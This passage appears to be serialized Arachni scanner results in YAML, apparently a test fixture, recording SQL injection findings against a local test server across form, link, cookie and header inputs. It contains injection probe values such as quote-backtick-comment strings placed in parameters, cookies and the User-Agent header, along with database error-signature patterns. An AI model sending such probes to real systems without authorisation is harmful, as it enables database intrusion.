      OWASP: http://www.owasp.org/index.php/SQL_Injection
    regexp: (?i-mx:Unexpected end of command in statement)
    regexp_match: Unexpected end of command in statement
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in database queries.
    response: |
      <b>Warning</b>: ibase_
      Unexpected end of command in statement

    severity: High
    tags: 
    - sql
    - injection
    - regexp
    - database
    - error
    url: http://localhost:7842/interbase/header/append
    var: User-Agent
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "89"
  cwe_url: http://cwe.mitre.org/data/definitions/89.html
  description: SQL code can be injected into the web application.
  elem: form
  internal_modname: SQLInjection
  metasploitable: unix/webapp/arachni_sqlmap
  method: GET
  mod_name: SQLInjection
  name: SQL Injection
  references: 
    UnixWiz: http://unixwiz.net/techtips/sql-injection.html
    Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
    SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
    OWASP: http://www.owasp.org/index.php/SQL_Injection
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in database queries.
  severity: High
  tags: 
  - sql
  - injection
  - regexp
  - database
  - error
  url: http://localhost:7842/postgresql/form/flip
  var: Parameter flip
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "89"
    cwe_url: http://cwe.mitre.org/data/definitions/89.html
    description: SQL code can be injected into the web application.
    elem: form
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "185"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "PostgreSQL query failed:"
    injected: ""
    internal_modname: SQLInjection
    metasploitable: unix/webapp/arachni_sqlmap
    method: GET
    mod_name: SQLInjection
    name: SQL Injection
    opts: 
      :redundant: false
      :async: true
      :regexp: (?i-mx:PostgreSQL query failed:)
      :match: "PostgreSQL query failed:"
      :substring: 
      :ignore: 
      - String or binary data would be truncated
      - Access denied for user
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :param_flip: true
      :injected_orig: "'`--"
      :altered: Parameter flip
      :element: form
      :params: 
        input: default
        "'`--": 71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :follow_location: true
      :injected: ""
      :combo: 
        input: default
        "'`--": 71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :action: http://localhost:7842/postgresql/form/flip
      :verification: false
      :id: "PostgreSQL query failed:"
    references: 
      UnixWiz: http://unixwiz.net/techtips/sql-injection.html
      Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
      SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
      OWASP: http://www.owasp.org/index.php/SQL_Injection
    regexp: (?i-mx:PostgreSQL query failed:)
    regexp_match: "PostgreSQL query failed:"
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in database queries.
    response: "[\"PostgreSQL query failed:\\nsupplied argument is not a valid PostgreSQL result\\npg_query() [:\\npg_exec() [:\\nPostgreSQL.*ERROR\\nWarning stuff pg_ stuff\\nvalid PostgreSQL result\\n\", nil]"
    severity: High
    tags: 
    - sql
    - injection
    - regexp
    - database
    - error
    url: http://localhost:7842/postgresql/form/flip
    var: Parameter flip
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "89"
  cwe_url: http://cwe.mitre.org/data/definitions/89.html
  description: SQL code can be injected into the web application.
  elem: form
  internal_modname: SQLInjection
  metasploitable: unix/webapp/arachni_sqlmap
  method: GET
  mod_name: SQLInjection
  name: SQL Injection
  references: 
    UnixWiz: http://unixwiz.net/techtips/sql-injection.html
    Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
    SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
    OWASP: http://www.owasp.org/index.php/SQL_Injection
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in database queries.
  severity: High
  tags: 
  - sql
  - injection
  - regexp
  - database
  - error
  url: http://localhost:7842/postgresql/form/append
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "89"
    cwe_url: http://cwe.mitre.org/data/definitions/89.html
    description: SQL code can be injected into the web application.
    elem: form
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "169"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "PostgreSQL query failed:"
    injected: default'`--
    internal_modname: SQLInjection
    metasploitable: unix/webapp/arachni_sqlmap
    method: GET
    mod_name: SQLInjection
    name: SQL Injection
    opts: 
      :redundant: false
      :async: true
      :regexp: (?i-mx:PostgreSQL query failed:)
      :match: "PostgreSQL query failed:"
      :substring: 
      :ignore: 
      - String or binary data would be truncated
      - Access denied for user
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :param_flip: true
      :injected_orig: "'`--"
      :altered: input
      :element: form
      :params: 
        input: default'`--
      :follow_location: true
      :injected: default'`--
      :combo: 
        input: default'`--
      :action: http://localhost:7842/postgresql/form/append
      :verification: false
      :id: "PostgreSQL query failed:"
    references: 
      UnixWiz: http://unixwiz.net/techtips/sql-injection.html
      Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
      SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
      OWASP: http://www.owasp.org/index.php/SQL_Injection
    regexp: (?i-mx:PostgreSQL query failed:)
    regexp_match: "PostgreSQL query failed:"
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in database queries.
    response: |
      PostgreSQL query failed:
      supplied argument is not a valid PostgreSQL result
      pg_query() [:
      pg_exec() [:
      PostgreSQL.*ERROR
      Warning stuff pg_ stuff
      valid PostgreSQL result

    severity: High
    tags: 
    - sql
    - injection
    - regexp
    - database
    - error
    url: http://localhost:7842/postgresql/form/append
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "89"
  cwe_url: http://cwe.mitre.org/data/definitions/89.html
  description: SQL code can be injected into the web application.
  elem: link
  internal_modname: SQLInjection
  metasploitable: unix/webapp/arachni_sqlmap
  method: GET
  mod_name: SQLInjection
  name: SQL Injection
  references: 
    UnixWiz: http://unixwiz.net/techtips/sql-injection.html
    Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
    SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
    OWASP: http://www.owasp.org/index.php/SQL_Injection
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in database queries.
  severity: High
  tags: 
  - sql
  - injection
  - regexp
  - database
  - error
  url: http://localhost:7842/postgresql/link/flip?input=default
  var: Parameter flip
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "89"
    cwe_url: http://cwe.mitre.org/data/definitions/89.html
    description: SQL code can be injected into the web application.
    elem: link
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "185"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "PostgreSQL query failed:"
    injected: ""
    internal_modname: SQLInjection
    metasploitable: unix/webapp/arachni_sqlmap
    method: GET
    mod_name: SQLInjection
    name: SQL Injection
    opts: 
      :redundant: false
      :async: true
      :regexp: (?i-mx:PostgreSQL query failed:)
      :match: "PostgreSQL query failed:"
      :substring: 
      :ignore: 
      - String or binary data would be truncated
      - Access denied for user
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :param_flip: true
      :injected_orig: "'`--"
      :altered: Parameter flip
      :element: link
      :params: 
        input: default
        "'`--": 71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :follow_location: true
      :injected: ""
      :combo: 
        input: default
        "'`--": 71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :action: http://localhost:7842/postgresql/link/flip?input=default
      :verification: false
      :id: "PostgreSQL query failed:"
    references: 
      UnixWiz: http://unixwiz.net/techtips/sql-injection.html
      Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
      SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
      OWASP: http://www.owasp.org/index.php/SQL_Injection
    regexp: (?i-mx:PostgreSQL query failed:)
    regexp_match: "PostgreSQL query failed:"
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in database queries.
    response: "[\"PostgreSQL query failed:\\nsupplied argument is not a valid PostgreSQL result\\npg_query() [:\\npg_exec() [:\\nPostgreSQL.*ERROR\\nWarning stuff pg_ stuff\\nvalid PostgreSQL result\\n\", nil]"
    severity: High
    tags: 
    - sql
    - injection
    - regexp
    - database
    - error
    url: http://localhost:7842/postgresql/link/flip?input=default
    var: Parameter flip
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "89"
  cwe_url: http://cwe.mitre.org/data/definitions/89.html
  description: SQL code can be injected into the web application.
  elem: link
  internal_modname: SQLInjection
  metasploitable: unix/webapp/arachni_sqlmap
  method: GET
  mod_name: SQLInjection
  name: SQL Injection
  references: 
    UnixWiz: http://unixwiz.net/techtips/sql-injection.html
    Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
    SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
    OWASP: http://www.owasp.org/index.php/SQL_Injection
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in database queries.
  severity: High
  tags: 
  - sql
  - injection
  - regexp
  - database
  - error
  url: http://localhost:7842/postgresql/link/append?input=default
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "89"
    cwe_url: http://cwe.mitre.org/data/definitions/89.html
    description: SQL code can be injected into the web application.
    elem: link
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "169"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "PostgreSQL query failed:"
    injected: default'`--
    internal_modname: SQLInjection
    metasploitable: unix/webapp/arachni_sqlmap
    method: GET
    mod_name: SQLInjection
    name: SQL Injection
    opts: 
      :redundant: false
      :async: true
      :regexp: (?i-mx:PostgreSQL query failed:)
      :match: "PostgreSQL query failed:"
      :substring: 
      :ignore: 
      - String or binary data would be truncated
      - Access denied for user
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :param_flip: true
      :injected_orig: "'`--"
      :altered: input
      :element: link
      :params: 
        input: default'`--
      :follow_location: true
      :injected: default'`--
      :combo: 
        input: default'`--
      :action: http://localhost:7842/postgresql/link/append?input=default
      :verification: false
      :id: "PostgreSQL query failed:"
    references: 
      UnixWiz: http://unixwiz.net/techtips/sql-injection.html
      Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
      SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
      OWASP: http://www.owasp.org/index.php/SQL_Injection
    regexp: (?i-mx:PostgreSQL query failed:)
    regexp_match: "PostgreSQL query failed:"
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in database queries.
    response: |
      PostgreSQL query failed:
      supplied argument is not a valid PostgreSQL result
      pg_query() [:
      pg_exec() [:
      PostgreSQL.*ERROR
      Warning stuff pg_ stuff
      valid PostgreSQL result

    severity: High
    tags: 
    - sql
    - injection
    - regexp
    - database
    - error
    url: http://localhost:7842/postgresql/link/append?input=default
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "89"
  cwe_url: http://cwe.mitre.org/data/definitions/89.html
  description: SQL code can be injected into the web application.
  elem: cookie
  internal_modname: SQLInjection
  metasploitable: unix/webapp/arachni_sqlmap
  method: GET
  mod_name: SQLInjection
  name: SQL Injection
  references: 
    UnixWiz: http://unixwiz.net/techtips/sql-injection.html
    Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
    SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
    OWASP: http://www.owasp.org/index.php/SQL_Injection
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in database queries.
  severity: High
  tags: 
  - sql
  - injection
  - regexp
  - database
  - error
  url: http://localhost:7842/postgresql/cookie/flip
  var: Parameter flip
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "89"
    cwe_url: http://cwe.mitre.org/data/definitions/89.html
    description: SQL code can be injected into the web application.
    elem: cookie
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie2=cookie+value;)=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "185"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "PostgreSQL query failed:"
    injected: ""
    internal_modname: SQLInjection
    metasploitable: unix/webapp/arachni_sqlmap
    method: GET
    mod_name: SQLInjection
    name: SQL Injection
    opts: 
      :redundant: false
      :async: true
      :regexp: (?i-mx:PostgreSQL query failed:)
      :match: "PostgreSQL query failed:"
      :substring: 
      :ignore: 
      - String or binary data would be truncated
      - Access denied for user
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: )
      :altered: Parameter flip
      :element: cookie
      :params: {}

      :follow_location: true
      :cookies: 
        ): 71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :injected: ""
      :combo: 
        ): 71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :action: http://localhost:7842/postgresql/cookie/flip
      :verification: false
      :id: "PostgreSQL query failed:"
    references: 
      UnixWiz: http://unixwiz.net/techtips/sql-injection.html
      Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
      SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
      OWASP: http://www.owasp.org/index.php/SQL_Injection
    regexp: (?i-mx:PostgreSQL query failed:)
    regexp_match: "PostgreSQL query failed:"
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in database queries.
    response: "[nil, \"PostgreSQL query failed:\\nsupplied argument is not a valid PostgreSQL result\\npg_query() [:\\npg_exec() [:\\nPostgreSQL.*ERROR\\nWarning stuff pg_ stuff\\nvalid PostgreSQL result\\n\"]"
    severity: High
    tags: 
    - sql
    - injection
    - regexp
    - database
    - error
    url: http://localhost:7842/postgresql/cookie/flip
    var: Parameter flip
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "89"
  cwe_url: http://cwe.mitre.org/data/definitions/89.html
  description: SQL code can be injected into the web application.
  elem: cookie
  internal_modname: SQLInjection
  metasploitable: unix/webapp/arachni_sqlmap
  method: GET
  mod_name: SQLInjection
  name: SQL Injection
  references: 
    UnixWiz: http://unixwiz.net/techtips/sql-injection.html
    Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
    SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
    OWASP: http://www.owasp.org/index.php/SQL_Injection
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in database queries.
  severity: High
  tags: 
  - sql
  - injection
  - regexp
  - database
  - error
  url: http://localhost:7842/postgresql/cookie/append
  var: cookie2
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "89"
    cwe_url: http://cwe.mitre.org/data/definitions/89.html
    description: SQL code can be injected into the web application.
    elem: cookie
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie2=cookie+value'`--
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "169"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "PostgreSQL query failed:"
    injected: cookie value'`--
    internal_modname: SQLInjection
    metasploitable: unix/webapp/arachni_sqlmap
    method: GET
    mod_name: SQLInjection
    name: SQL Injection
    opts: 
      :redundant: false
      :async: true
      :regexp: (?i-mx:PostgreSQL query failed:)
      :match: "PostgreSQL query failed:"
      :substring: 
      :ignore: 
      - String or binary data would be truncated
      - Access denied for user
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: "'`--"
      :altered: cookie2
      :element: cookie
      :params: {}

      :follow_location: true
      :cookies: 
        cookie2: cookie value'`--
      :injected: cookie value'`--
      :combo: 
        cookie2: cookie value'`--
      :action: http://localhost:7842/postgresql/cookie/append
      :verification: false
      :id: "PostgreSQL query failed:"
    references: 
      UnixWiz: http://unixwiz.net/techtips/sql-injection.html
      Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
      SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
      OWASP: http://www.owasp.org/index.php/SQL_Injection
    regexp: (?i-mx:PostgreSQL query failed:)
    regexp_match: "PostgreSQL query failed:"
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in database queries.
    response: |
      PostgreSQL query failed:
      supplied argument is not a valid PostgreSQL result
      pg_query() [:
      pg_exec() [:
      PostgreSQL.*ERROR
      Warning stuff pg_ stuff
      valid PostgreSQL result

    severity: High
    tags: 
    - sql
    - injection
    - regexp
    - database
    - error
    url: http://localhost:7842/postgresql/cookie/append
    var: cookie2
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "89"
  cwe_url: http://cwe.mitre.org/data/definitions/89.html
  description: SQL code can be injected into the web application.
  elem: header
  internal_modname: SQLInjection
  metasploitable: unix/webapp/arachni_sqlmap
  method: GET
  mod_name: SQLInjection
  name: SQL Injection
  references: 
    UnixWiz: http://unixwiz.net/techtips/sql-injection.html
    Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
    SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
    OWASP: http://www.owasp.org/index.php/SQL_Injection
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in database queries.
  severity: High
  tags: 
  - sql
  - injection
  - regexp
  - database
  - error
  url: http://localhost:7842/postgresql/header/flip
  var: Parameter flip
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "89"
    cwe_url: http://cwe.mitre.org/data/definitions/89.html
    description: SQL code can be injected into the web application.
    elem: header
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        "'`--": 71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
        Cookie: cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "335"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "PostgreSQL query failed:"
    injected: ""
    internal_modname: SQLInjection
    metasploitable: unix/webapp/arachni_sqlmap
    method: GET
    mod_name: SQLInjection
    name: SQL Injection
    opts: 
      :redundant: false
      :async: true
      :regexp: (?i-mx:PostgreSQL query failed:)
      :match: "PostgreSQL query failed:"
      :substring: 
      :ignore: 
      - String or binary data would be truncated
      - Access denied for user
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: "'`--"
      :altered: Parameter flip
      :element: header
      :params: 
      :follow_location: true
      :headers: 
        "'`--": 71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :injected: ""
      :combo: 
        "'`--": 71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :action: http://localhost:7842/postgresql/header/flip
      :verification: false
      :id: "PostgreSQL query failed:"
    references: 
      UnixWiz: http://unixwiz.net/techtips/sql-injection.html
      Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
      SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
      OWASP: http://www.owasp.org/index.php/SQL_Injection
    regexp: (?i-mx:PostgreSQL query failed:)
    regexp_match: "PostgreSQL query failed:"
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in database queries.
    response: "[nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, \"PostgreSQL query failed:\\nsupplied argument is not a valid PostgreSQL result\\npg_query() [:\\npg_exec() [:\\nPostgreSQL.*ERROR\\nWarning stuff pg_ stuff\\nvalid PostgreSQL result\\n\", nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil]"
    severity: High
    tags: 
    - sql
    - injection
    - regexp
    - database
    - error
    url: http://localhost:7842/postgresql/header/flip
    var: Parameter flip
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "89"
  cwe_url: http://cwe.mitre.org/data/definitions/89.html
  description: SQL code can be injected into the web application.
  elem: header
  internal_modname: SQLInjection
  metasploitable: unix/webapp/arachni_sqlmap
  method: GET
  mod_name: SQLInjection
  name: SQL Injection
  references: 
    UnixWiz: http://unixwiz.net/techtips/sql-injection.html
    Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
    SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
    OWASP: http://www.owasp.org/index.php/SQL_Injection
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in database queries.
  severity: High
  tags: 
  - sql
  - injection
  - regexp
  - database
  - error
  url: http://localhost:7842/postgresql/header/append
  var: User-Agent
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "89"
    cwe_url: http://cwe.mitre.org/data/definitions/89.html
    description: SQL code can be injected into the web application.
    elem: header
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: arachni_user'`--
        Cookie: cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "169"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "PostgreSQL query failed:"
    injected: arachni_user'`--
    internal_modname: SQLInjection
    metasploitable: unix/webapp/arachni_sqlmap
    method: GET
    mod_name: SQLInjection
    name: SQL Injection
    opts: 
      :redundant: false
      :async: true
      :regexp: (?i-mx:PostgreSQL query failed:)
      :match: "PostgreSQL query failed:"
      :substring: 
      :ignore: 
      - String or binary data would be truncated
      - Access denied for user
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: "'`--"
      :altered: User-Agent
      :element: header
      :params: 
      :follow_location: true
      :headers: 
        User-Agent: arachni_user'`--
      :injected: arachni_user'`--
      :combo: 
        User-Agent: arachni_user'`--
      :action: http://localhost:7842/postgresql/header/append
      :verification: false
      :id: "PostgreSQL query failed:"
    references: 
      UnixWiz: http://unixwiz.net/techtips/sql-injection.html
      Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
      SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
      OWASP: http://www.owasp.org/index.php/SQL_Injection
    regexp: (?i-mx:PostgreSQL query failed:)
    regexp_match: "PostgreSQL query failed:"
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in database queries.
    response: |
      PostgreSQL query failed:
      supplied argument is not a valid PostgreSQL result
      pg_query() [:
      pg_exec() [:
      PostgreSQL.*ERROR
      Warning stuff pg_ stuff
      valid PostgreSQL result

    severity: High
    tags: 
    - sql
    - injection
    - regexp
    - database
    - error
    url: http://localhost:7842/postgresql/header/append
    var: User-Agent
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "89"
  cwe_url: http://cwe.mitre.org/data/definitions/89.html
  description: SQL code can be injected into the web application.
  elem: form
  internal_modname: SQLInjection
  metasploitable: unix/webapp/arachni_sqlmap
  method: GET
  mod_name: SQLInjection
  name: SQL Injection
  references: 
    UnixWiz: http://unixwiz.net/techtips/sql-injection.html
    Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
    SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
    OWASP: http://www.owasp.org/index.php/SQL_Injection
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in database queries.
  severity: High
  tags: 
  - sql
  - injection
  - regexp
  - database
  - error
  url: http://localhost:7842/mysql/form/flip
  var: Parameter flip
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "89"
    cwe_url: http://cwe.mitre.org/data/definitions/89.html
    description: SQL code can be injected into the web application.
    elem: form
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "409"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: supplied argument is not a valid MySQL
    injected: ""
    internal_modname: SQLInjection
    metasploitable: unix/webapp/arachni_sqlmap
    method: GET
    mod_name: SQLInjection
    name: SQL Injection
    opts: 
      :redundant: false
      :async: true
      :regexp: (?i-mx:supplied argument is not a valid MySQL)
      :match: supplied argument is not a valid MySQL
      :substring: 
      :ignore: 
      - String or binary data would be truncated
      - Access denied for user
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :param_flip: true
      :injected_orig: "'`--"
      :altered: Parameter flip
      :element: form
      :params: 
        input: default
        "'`--": 71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :follow_location: true
      :injected: ""
      :combo: 
        input: default
        "'`--": 71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :action: http://localhost:7842/mysql/form/flip
      :verification: false
      :id: supplied argument is not a valid MySQL
    references: 
      UnixWiz: http://unixwiz.net/techtips/sql-injection.html
      Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
      SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
      OWASP: http://www.owasp.org/index.php/SQL_Injection
    regexp: (?i-mx:supplied argument is not a valid MySQL)
    regexp_match: supplied argument is not a valid MySQL
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in database queries.
    response: "[\"supplied argument is not a valid MySQL\\nColumn count doesn't match value count at row\\nmysql_fetch_array()\\non MySQL result index\\nYou have an error in your SQL syntax;\\nYou have an error in your SQL syntax near\\nMySQL server version for the right syntax to use\\n[MySQL][ODBC\\nColumn count doesn't match\\nTable 'Stuff' doesn't exist\\nSQL syntax stuff MySQL\\nWarning stuff mysql_\\nvalid MySQL result\\n\", nil]"
    severity: High
    tags: 
    - sql
    - injection
    - regexp
    - database
    - error
    url: http://localhost:7842/mysql/form/flip
    var: Parameter flip
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "89"
  cwe_url: http://cwe.mitre.org/data/definitions/89.html
  description: SQL code can be injected into the web application.
  elem: form
  internal_modname: SQLInjection
  metasploitable: unix/webapp/arachni_sqlmap
  method: GET
  mod_name: SQLInjection
  name: SQL Injection
  references: 
    UnixWiz: http://unixwiz.net/techtips/sql-injection.html
    Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
    SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
    OWASP: http://www.owasp.org/index.php/SQL_Injection
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in database queries.
  severity: High
  tags: 
  - sql
  - injection
  - regexp
  - database
  - error
  url: http://localhost:7842/mysql/form/append
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "89"
    cwe_url: http://cwe.mitre.org/data/definitions/89.html
    description: SQL code can be injected into the web application.
    elem: form
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "387"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: supplied argument is not a valid MySQL
